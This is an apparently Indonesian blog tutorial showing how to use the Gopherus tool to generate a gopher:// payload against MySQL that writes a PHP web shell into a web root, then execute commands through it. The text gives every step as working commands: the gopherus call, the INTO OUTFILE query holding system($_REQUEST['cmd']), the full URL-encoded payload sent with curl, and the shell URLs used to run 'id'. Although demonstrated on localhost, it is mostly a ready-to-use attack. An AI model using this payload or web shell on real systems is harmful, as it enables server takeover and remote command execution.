Halo gaes kembali lagi dengan gw yukinoshita 47 kali ini gw mau sharing Gopherus lagi ini wkwkwkwk cerita ini adalah lanjutan dari sebelum nya https://yukinoshita47.blogspot.com/2019/05/parrot-linux-exploitasi-mysql-dengan.html ya masih di localhost wkwkwkwk mungkin nanti baru gw coba versi remote nya.
oke langsung aja ya gaes pertama masuk dulu ke root dengan perintah
sudo su
kemudian tekan enter
lalu buat payload gopher nya dengan perintah
gopherus --exploit mysql
kemudian tekan enter
kemudian pada bagian
Give MySQL username (isi username mysql lu contoh): root
kemudian tekan enter
Give query to execute (isi perintah MySQL nya untuk generate shell): select "<?php system($_REQUEST['cmd']); ?>" INTO OUTFILE '/var/www/html/shell.php'
tekan enter lagi
dan url gopher payload nya pun muncul
kemudian eksekusi payload nya dengan perintah
curl gopher://127.0.0.1:3306/_%a3%01%85%a6%ff%01%01%21%72%6f%6f%74%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%66%03%5f%6f%73%05%4c%69%6e%75%78%0c%5f%63%6c%69%65%6e%74%5f%6e%61%6d%65%08%6c%69%62%6d%79%73%71%6c%04%5f%70%69%64%05%32%37%32%35%35%0f%5f%63%6c%69%65%6e%74%5f%76%65%72%73%69%6f%6e%06%35%2e%37%2e%32%32%09%5f%70%6c%61%74%66%6f%72%6d%06%78%38%36%5f%36%34%0c%70%72%6f%67%72%61%6d%5f%6e%61%6d%65%05%6d%79%73%71%6c%53%03%73%65%6c%65%63%74%20%22%3c%3f%70%68%70%20%73%79%73%74%65%6d%28%24%5f%52%45%51%55%45%53%54%5b%27%63%6d%64%27%5d%29%3b%20%3f%3e%22%20%49%4e%54%4f%20%4f%55%54%46%49%4c%45%20%27%2f%76%61%72%2f%77%77%77%2f%68%74%6d%6c%2f%73%68%65%6c%6c%2e%70%68%70%27%01%01 --output shell.log
kemudian tekan enter
kemudian liat output nya apakah upload shell nya berhasil atau kagak
cat shell.log
kemudian tekan enter
dan disini berhasil upload shelll sesuai perintah mysql tadi di /var/www/html/
kemudian akses dibrowser deh shell nya disini http://127.0.0.1/shell.php
cara eksekusi shell nya contoh http://127.0.0.1/shell.php?cmd=id
dan output nya keliatan seperti gambar dibawah ini
via terminal juga bisa kok dengan perintah curl contoh
curl http://127.0.0.1/shell.php?cmd=id
kemudian tekan enter
dan voila
oke sampai disini aja tutorial unfaedah ini ntar gw share lagi kalo gw dapat metode lainnya.
